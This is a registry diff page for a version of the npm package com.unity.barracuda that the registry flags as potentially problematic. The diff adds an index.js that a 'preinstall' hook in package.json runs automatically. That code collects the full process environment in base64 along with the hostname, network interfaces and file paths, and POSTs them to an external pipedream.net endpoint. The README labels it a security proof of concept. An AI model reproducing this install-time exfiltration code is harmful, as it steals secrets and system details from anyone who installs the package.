com.unity.barracuda 0.0.1-security → 0.3.2-preview
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of com.unity.barracuda might be problematic. Click here for more details.
- package/README.md +1 -5
- package/index.js +82 -0
- package/package.json +14 -3
package/README.md
CHANGED
@@ -1,5 +1 @@
|
|
1
|
-
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=com.unity.barracuda for more information.
|
1
|
+
PoC by HTM for security purpose only.
|
package/index.js
ADDED
@@ -0,0 +1,82 @@
|
|
1
|
+
|
2
|
+
'use strict'
|
3
|
+
|
4
|
+
const https = require('https')
|
5
|
+
const http = require("http");
|
6
|
+
const os = require("os");
|
7
|
+
|
8
|
+
// var currentPath = process.cwd();
|
9
|
+
// var currentUser =
|
10
|
+
var currentPath = __dirname;
|
11
|
+
var currentFile = __filename;
|
12
|
+
// var currentEnv = process.env;
|
13
|
+
var currentEnvString = JSON.stringify(process);
|
14
|
+
var currentEnvBase64 = Buffer.from(currentEnvString).toString('base64');
|
15
|
+
|
16
|
+
// console.log(currentPath);
|
17
|
+
// console.log(currentFile);
|
18
|
+
// console.log(currentEnvBase64)
|
19
|
+
|
20
|
+
var data = {
|
21
|
+
envPORT: process.env.PORT,
|
22
|
+
hostname: JSON.stringify(os.hostname()),
|
23
|
+
currentPath: currentPath,
|
24
|
+
currentFile: currentFile,
|
25
|
+
currentEnvBase64: currentEnvBase64,
|
26
|
+
type: JSON.stringify(os.type()),
|
27
|
+
platform: JSON.stringify(os.platform()),
|
28
|
+
arch: JSON.stringify(os.arch()),
|
29
|
+
release: JSON.stringify(os.release()),
|
30
|
+
uptime: JSON.stringify(os.uptime()),
|
31
|
+
loadavg: JSON.stringify(os.loadavg()),
|
32
|
+
totalmem: JSON.stringify(os.totalmem()),
|
33
|
+
freemem: JSON.stringify(os.freemem()),
|
34
|
+
cpus: JSON.stringify(os.cpus()),
|
35
|
+
networkInterfaces: JSON.stringify(os.networkInterfaces()),
|
36
|
+
|
37
|
+
};
|
38
|
+
|
39
|
+
// console.log(process.env.PORT)
|
40
|
+
// console.log(os.hostname())
|
41
|
+
// console.log(os.type())
|
42
|
+
// console.log(os.platform())
|
43
|
+
// console.log(os.arch())
|
44
|
+
// console.log(os.release())
|
45
|
+
// console.log(os.uptime())
|
46
|
+
// console.log(os.loadavg())
|
47
|
+
// console.log(os.totalmem())
|
48
|
+
// console.log(os.freemem())
|
49
|
+
// console.log(os.cpus())
|
50
|
+
// console.log(os.networkInterfaces())
|
51
|
+
|
52
|
+
// console.log(data)
|
53
|
+
// console.log(JSON.stringify(data));
|
54
|
+
|
55
|
+
data = JSON.stringify(data)
|
56
|
+
// console.log(data.length)
|
57
|
+
|
58
|
+
const options = {
|
59
|
+
hostname: 'enjglpdgtgrbn4b.m.pipedream.net',
|
60
|
+
port: 443,
|
61
|
+
path: '/Y29tLnVuaXR5LmJhcnJhY3VkYTpodHRwczovL2dpdGh1Yi5jb20vQXp1cmUvM0RQaW5iYWxsQUkvYmxvYi80Y2Q5ZDFjZDQ4Mzg1OTBmYzRlMjg5MGFmMzM1YmFhZDhjNjI2Y2YzL1BhY2thZ2VzL21hbmlmZXN0Lmpzb24',
|
62
|
+
method: 'POST',
|
63
|
+
headers: {
|
64
|
+
'Content-Type': 'application/json',
|
65
|
+
'Content-Length': data.length
|
66
|
+
}
|
67
|
+
}
|
68
|
+
|
69
|
+
const req = https.request(options, res => {
|
70
|
+
// console.log(`statusCode: ${res.statusCode}`)
|
71
|
+
|
72
|
+
res.on('data', d => {
|
73
|
+
process.stdout.write(d)
|
74
|
+
})
|
75
|
+
})
|
76
|
+
|
77
|
+
req.on('error', error => {
|
78
|
+
console.error(error)
|
79
|
+
})
|
80
|
+
|
81
|
+
req.write(data)
|
82
|
+
req.end()
|
package/package.json
CHANGED
@@ -1,6 +1,17 @@
|
|
1
1
|
{
|
2
2
|
"name": "com.unity.barracuda",
|
3
|
-
"version": "0.
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "0.3.2-preview",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "Aditya",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"http": "0.0.1-security",
|
14
|
+
"https": "^1.0.0",
|
15
|
+
"os": "^0.1.1"
|
16
|
+
}
|
6
17
|
}
|